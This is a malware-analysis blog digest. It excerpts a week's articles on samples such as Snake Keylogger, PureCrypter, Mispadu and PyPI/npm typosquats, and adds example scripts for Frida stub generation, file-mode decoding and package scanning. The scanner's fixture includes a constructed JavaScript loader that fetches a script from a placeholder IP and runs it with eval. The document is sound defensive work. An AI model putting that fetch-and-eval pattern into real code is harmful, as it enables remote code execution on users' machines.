Analysis Notes

A place to note things from trying out malware analysis and anything that seemed likely to be useful for analysis. This site uses Google Analytics.

4n6 Week 13 – 2024 - MALWARE

This entry was auto-generated and posted to show the opening lines of each article introduced in This Week in 4n6 (FourAndSix = Forensics), so that the articles worth checking can be skimmed quickly. 4n6 itself can be found here.

MALWARE

Adam at Hexacorn

Posted on 2024-03-31 by adam. As many of you know, I am a big fan of Frida framework and I love its intuitiveness and flexibility, especially when it comes to auto-generating handlers for hooked functions, even if they are randomly chosen. In my older Frida Delphi project I focused on functions that I could define. Today, I will focus on functions that are unknown. How? We are going to write an IdaPython script that will generate simple logging/tracing function stubs for all the subroutines that ...
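
The generation step the post describes, as an added example that is not Hexacorn's script: take a list of (address, name) pairs as IDA reports them and emit one Frida Interceptor.attach() logging stub per subroutine. Inside IDA the list comes from idautils.Functions(); outside IDA that import fails, so the code falls back to a constructed sample list with made-up addresses and an assumed image base of 0x400000. The stubs address each function as module base plus RVA so the resulting script survives ASLR.

```python
"""Generate Frida logging stubs for a list of subroutines.

Added example; not Hexacorn's script. The function list would normally
come from IDAPython (idautils.Functions()), which is unavailable outside
IDA, so collect_functions() falls back to a constructed sample list when
the idautils module cannot be imported. Sample addresses are made up.
"""
import json

# Assumed image base of the analysed binary; inside IDA the real one is
# idaapi.get_imagebase(). Stubs compute an RVA from it so the Frida script
# works wherever the module is loaded at runtime.
ASSUMED_IMAGE_BASE = 0x400000

# Constructed sample: (address, name) pairs as IDA would report them.
SAMPLE_FUNCTIONS = [
    (0x401000, "sub_401000"),
    (0x401230, "sub_401230"),
    (0x4015A0, "DecryptConfig"),
]


def collect_functions():
    """Return (image_base, [(ea, name), ...]) for every function in the IDB.

    Inside IDA this uses idautils/idc/idaapi; elsewhere it returns the
    constructed sample so the generator can be exercised offline.
    """
    try:
        import idautils
        import idc
        import idaapi
    except ImportError:
        return ASSUMED_IMAGE_BASE, list(SAMPLE_FUNCTIONS)
    base = idaapi.get_imagebase()
    return base, [(ea, idc.get_func_name(ea)) for ea in idautils.Functions()]


def make_stub(module, ea, name, base, nargs=4):
    """Emit one Interceptor.attach() block that logs entry and return value.

    Frida has no type information for unknown subs, so the stub just dumps
    the first `nargs` pointer-sized arguments on entry and retval on leave.
    """
    rva = ea - base
    js_name = json.dumps(name)  # safe quoting for the log label
    args = ", ".join(f"args[{i}]" for i in range(nargs))
    return f"""Interceptor.attach(Module.findBaseAddress({json.dumps(module)}).add(0x{rva:x}), {{
  onEnter(args) {{
    console.log({js_name} + " called from " + this.returnAddress + " args: " + [{args}].join(", "));
  }},
  onLeave(retval) {{
    console.log({js_name} + " returned " + retval);
  }}
}});"""


def generate_script(module, funcs, base, nargs=4):
    """Concatenate stubs for every function into one Frida script."""
    header = f"// auto-generated tracing stubs for {module}, {len(funcs)} functions\n"
    return header + "\n".join(make_stub(module, ea, name, base, nargs) for ea, name in funcs)


if __name__ == "__main__":
    base, funcs = collect_functions()
    print(generate_script("sample.exe", funcs, base))
```

Run the script from IDA's Python console (or the File > Script file dialog) to emit stubs for the real IDB, or stand-alone to see the output shape; pipe the result into a .js file and load it with frida -l. The module name "sample.exe" is a placeholder for whatever the hooked process loads.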

Any.Run

March 25, 2024 (22 min read): Reverse Engineering Snake Keylogger: Full .NET Malware Analysis Walkthrough. Introduction: In order to understand malware comprehensively, it is e...

March 26, 2024 (7 min read): What are Threat Intelligence Feeds? Threat Intelligence Feeds are data streams of indicators of compromise (like malicious domains, IP addresses, links and file hashes). Th...

March 27, 2024 (3 min read): New BunnyLoader Version Gains Modular Capabilities. BunnyLoader is a rapidly evolving malware written in C/C++. Originally released in September 2023, it has ...

March 28, 2024 (9 min read): Basic Malware Packers: What are They and How to Analyze Them in ANY.RUN. Sneaking an .exe file into a system without the anti-virus being...

ASEC

AhnLab SEcurity intelligence Center (ASEC) recently discovered the Kimsuky group distributing malware disguised as an installer from a Korean public institution. The malware in question is a dropper that creates the Endoor backdoor, which was also used in the attack covered in the previous post, “TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)”. [1] While there are no records of the dropper being used in actual attacks, there was an attack case that inv...

Bart at Blaze’s Security Blog

Introduction. Earlier last week, I ran into a sample that turned out to be PureCrypter, a loader and obfuscator for all different kinds of malware such as Agent Tesla and RedLine. Upon further investigation, I developed Yara rules for the various stages, which can be found here (excluding the final payload): PureZip, PureCrypter, 2nd stage downloader (PureLogStealer related). With that out of the way, all of this reminded me of the fact that we can also write Yara rules for unique identifiers specific to...

Tatjana Ljucovic at cyber.wtf

Destructive IoT Malware Emulation – Part 1 of 3 – Environment Setup. Everyone who has delved a bit into malware analysis knows that you don't actually need much: a PC, a suitably configured VM, and the necessary analysis tools – and, of course, the malware itself. This is a simplified representation, but it captures the essence of the process. This approach is effective because the malware we typically analyze is compiled for the x86/x86_64 architecture. However, how do we handle the dynamic anal...

Dr Josh Stroschein

YouTube video

YouTube video

Igor Skochinsky at Hex Rays

Posted on 27 Mar 2024 by Igor Skochinsky. Categories: IDA Pro. Tags: idapro, idatips, shortcuts. We've covered simple enums previously, but there is a different kind of enum that you may sometimes encounter or need to create manually. They are used to represent various bits (or flags) which may be set in an integer value. For example, the file mode on Unix filesystems contains Access Permission bits (you can see them in the output of ls as a string like -rwxr-xr-x), and each bit has a corresponding c...
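
The file-mode example from the tip, worked through in code as an added illustration (not Hex-Rays code): each permission bit maps to one named constant, which is exactly what a bitfield enum models, and the function renders the same ls-style string. The caveat worth seeing is that st_mode is not purely a set of flags: the file type lives in a multi-bit field that has to be extracted with the S_IFMT mask and compared against enumerated values, so it needs a masked enum member rather than independent flag bits. The constant names and values come from Python's stat module.

```python
"""Decode a Unix st_mode value into its flag constants and ls-style string.

Added example illustrating the bitmask-enum idea; it is not Hex-Rays code.
Constant names and values are the POSIX ones exposed by Python's stat module.
"""
import stat

# Single-bit permission flags, in the order ls prints them (owner, group, other).
PERM_BITS = [
    ("S_IRUSR", stat.S_IRUSR, "r"), ("S_IWUSR", stat.S_IWUSR, "w"), ("S_IXUSR", stat.S_IXUSR, "x"),
    ("S_IRGRP", stat.S_IRGRP, "r"), ("S_IWGRP", stat.S_IWGRP, "w"), ("S_IXGRP", stat.S_IXGRP, "x"),
    ("S_IROTH", stat.S_IROTH, "r"), ("S_IWOTH", stat.S_IWOTH, "w"), ("S_IXOTH", stat.S_IXOTH, "x"),
]
# Also single bits, but ls shows them by overwriting the corresponding x column.
SPECIAL_BITS = [("S_ISUID", stat.S_ISUID), ("S_ISGID", stat.S_ISGID), ("S_ISVTX", stat.S_ISVTX)]
# The file type is NOT a set of flags: it is a multi-bit field extracted with
# the S_IFMT mask and compared against enumerated values. Treating S_IFREG,
# S_IFDIR etc. as independent flag bits would decode it wrongly.
TYPE_CHARS = {stat.S_IFREG: "-", stat.S_IFDIR: "d", stat.S_IFLNK: "l", stat.S_IFCHR: "c",
              stat.S_IFBLK: "b", stat.S_IFIFO: "p", stat.S_IFSOCK: "s"}


def set_flags(mode):
    """Names of every single-bit constant set in mode (what a bitfield enum shows)."""
    return [name for name, bit, _ in PERM_BITS if mode & bit] + \
           [name for name, bit in SPECIAL_BITS if mode & bit]


def mode_string(mode):
    """Render mode the way ls -l does, e.g. 0o100755 -> '-rwxr-xr-x'."""
    chars = [TYPE_CHARS.get(stat.S_IFMT(mode), "?")]
    for _, bit, ch in PERM_BITS:
        chars.append(ch if mode & bit else "-")
    # setuid/setgid/sticky replace the x column at positions 3, 6 and 9:
    # lowercase when the underlying x bit is also set, uppercase when it is not.
    for pos, special, xbit, lo, up in (
        (3, stat.S_ISUID, stat.S_IXUSR, "s", "S"),
        (6, stat.S_ISGID, stat.S_IXGRP, "s", "S"),
        (9, stat.S_ISVTX, stat.S_IXOTH, "t", "T"),
    ):
        if mode & special:
            chars[pos] = lo if mode & xbit else up
    return "".join(chars)


if __name__ == "__main__":
    for m in (0o100755, 0o040755, 0o104755, 0o041777):
        print(f"{m:o}: {mode_string(m)} {set_flags(m)}")
```

When defining the equivalent enum in IDA, the nine permission bits and the three special bits become plain bitfield members, while the type values need a member with the S_IFMT mask so that S_IFDIR and S_IFREG are shown as alternatives rather than as overlapping flags.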

Arnold Osipov at Morphisec

Breaking Boundaries: Mispadu's Infiltration Beyond LATAM. Posted by Arnold Osipov on March 26, 2024. Recently, Morphisec Labs identified a significant increase in activity linked to Mispadu (also known as URSA), a banking trojan first flagged by ESET in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign. Introduction: Mispadu is a highly active banking trojan and Infostealer, now...

Joshua Kamp at NCC Group


PetiKVX

Mar 24, 2024 • petikvx. Links: Version at ANY.RUN, VT Link.
File Information: File type: PE32+ executable (console) x86-64, for MS Windows. Compiler: Microsoft Visual C/C++ (19.29.30140) [LTCG/C++]. Linker: Microsoft Linker (14.29.30140). Tool: Visual Studio (2019 version 16.11). File size: 203.00 KB (207872 bytes). Creation Time: 2023-10-22 00:24:41 UTC.
Infection process: The malware will search for all files except those with extensions .exe, .dll, and .sys. When it finds a file, it will open it and write ...

Mar 25, 2024 • petikvx. Links: Version at ANY.RUN, VT Link, VT Link. (Embedded tweet: "Deobfuscation" pic.twitter.com/j4Ty5K2wUi, petikvx (@petikvx), March 20, 2024.)
File Information: This ransomware is written in VB.NET and is protected with the .NET Reactor tool. The malware makes it appear as if it was authored by our colleagues MalwareHunterteam (//malwarehunterteam.com/ - //twitter.com/malwrhunterteam), but it is not the case. We will thus use NETReactorSlayer to deprotect it. Here are the results before and aft...

Phylum

On 26 March 2024, Phylum's automated risk detection platform picked up yet another typosquat campaign targeting some attackers' favorite targets in PyPI. As of writing, this attack still appears to be active and has come in two big waves after about a 20-hour break in between. So far, we've seen over 500 typosquat variations published targeting the following popular Python libraries: requests, py-cord, colorama, capmonstercloudclient, pillow, bip-utils, TensorFlow, BeautifulSoup, PyGame, simplejson, matplotlib, pytorc...

On 26 March 2024, Phylum’s automated risk detection platform flagged a suspicious publication to npm called vue2util. It bills itself as, and upon first glance appears to be, a simple collection of utility functions for various purposes such as working with objects, arrays, strings, and files. However, hidden in plain sight at the end of the file is a call to a function called loadScript that, unsurprisingly, loads and executes a script from a remote IP. Upon investigation, we found a cryptojack...
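
A simple source-level triage for the pattern just described, as an added example that is not Phylum's tooling: scan a package's JavaScript for URLs whose host is a bare IP address, for code-execution sinks, and for top-level calls placed after the module's exports, which is where the vue2util call sat. The JavaScript sample is constructed (the IP is from the documentation range 203.0.113.0/24), not the real package.

```python
"""Scan JavaScript package sources for remote script loading from raw IPs.

Added example; not Phylum's scanner. The JS sample is constructed and uses
a documentation-range IP, not the real vue2util package.
"""
import re

# Execution sinks that turn fetched text into running code.
SINKS = re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext|child_process)\b")
# http(s) URL whose host is a bare IPv4 address, optionally with a port and path.
IP_URL = re.compile(r"""https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/[^\s'"`]*)?""")
# Line that exports the module; anything executed after it is not part of the API.
EXPORTS = re.compile(r"\bmodule\.exports\b|\bexport\b")
# A bare top-level call such as loadScript(...) at the start of a line.
TOP_LEVEL_CALL = re.compile(r"^\s*[A-Za-z_$][\w$.]*\s*\(")


def scan_source(src):
    """Return the IP URLs, sinks and post-export calls found, plus a verdict."""
    lines = src.splitlines()
    ip_urls = [(i, m.group(0)) for i, line in enumerate(lines, 1) for m in IP_URL.finditer(line)]
    sinks = [(i, m.group(1)) for i, line in enumerate(lines, 1) for m in SINKS.finditer(line)]
    export_line = next((i for i, line in enumerate(lines, 1) if EXPORTS.search(line)), None)
    calls_after_exports = []
    if export_line is not None:
        calls_after_exports = [(i, line.strip()) for i, line in enumerate(lines, 1)
                               if i > export_line and TOP_LEVEL_CALL.match(line)]
    # A remote IP origin on its own is unusual for a utility library; paired with
    # an eval-style sink or with code that runs after the exports it is worth a look.
    suspicious = bool(ip_urls) and (bool(sinks) or bool(calls_after_exports))
    return {"ip_urls": ip_urls, "sinks": sinks,
            "calls_after_exports": calls_after_exports, "suspicious": suspicious}


# Constructed sample: a plausible helper library with a loader tacked on the end.
SAMPLE_JS = """\
function chunk(arr, n) { const out = []; for (let i = 0; i < arr.length; i += n) out.push(arr.slice(i, i + n)); return out; }
function loadScript(url) {
  require('http').get(url, r => { let b = ''; r.on('data', c => b += c); r.on('end', () => eval(b)); });
}
module.exports = { chunk };
loadScript('http://203.0.113.7:8080/init.js');
"""

if __name__ == "__main__":
    for key, value in scan_source(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

This is deliberately a coarse first pass: a minified or obfuscated package will split the URL across string concatenations and hide eval behind an alias, so the scan is for triage of what reaches a registry mirror, not a substitute for running the install scripts in a sandbox.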

Tom Elkins at Rapid7

Stories from the SOC Part 1: IDAT Loader to BruteRatel. Mar 28, 2024, Tom Elkins (last updated Fri, 29 Mar 2024 18:35:13 GMT). Rapid7's Managed Detection and Response (MDR) team continuously monitors our customers' environments, identifying emerging threats and developing new detections. In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malicious software designed to deliver and execute additional malware onto a victim's system. ...

Petar Kirhmajer at ReversingLabs

Here's what the RL research team knows about the suspicious SqzrFramework480 campaign, which is still available on the NuGet repository. By Petar Kirhmajer, Threat Researcher, ReversingLabs. A recent scan by ReversingLabs of the open source package manager NuGet uncovered a suspicious package, SqzrFramework480, that may be targeting developers working with technology made by a China-based firm that does industrial- and digital equipment manufacturing. In this blog post, we'...

Ryan at Intel Corgi

IntelCorgi, Mar 24, 2024. Summary: On 22 December, 2023 the journalist group Bellingcat tweeted that they had been the target of a malicious email message which spoofed USAID, and eventually led to the download of a "malicious file". During the course of my analysis I was able to replicate the infection chain, and build detection rules as a result. The sequence of events results in deploying an HTTP reverse shell based on an open-source offensive security tool which enabled the threat actors to har...

Securelist

Malware descriptions, 28 Mar 2024. Authors: Anderson Leite, Lisandro Ubiedo. Contents: Initial infection overview, Victim ID generation and persistence, C2 Communication, Encryption, Infrastructure, Victims, Conclusion, Indicators of compromise. DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target's computer. A Windows version of this RAT was used...

SonicWall

By Security News, March 25, 2024. Overview: This week, the SonicWall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the C2. There is currently no malware family affiliated, but the IP and URL addresses have been used by AgentTesla, GuLoader, PureLog Stealer and others. Technical Analysis: The sample is...

Vlad at ‘Слава Україні — Героям Слава!’

from Vladyslav Radetsky. Those who find it inconvenient to view on slideshare can take the pdf (~1.8 MB). Stay healthy, attentive and careful. Follow our page on Facebook. Glory to Ukraine. VR. Tags: exiftool, LNK, malware, msoffice, oletools, Opti...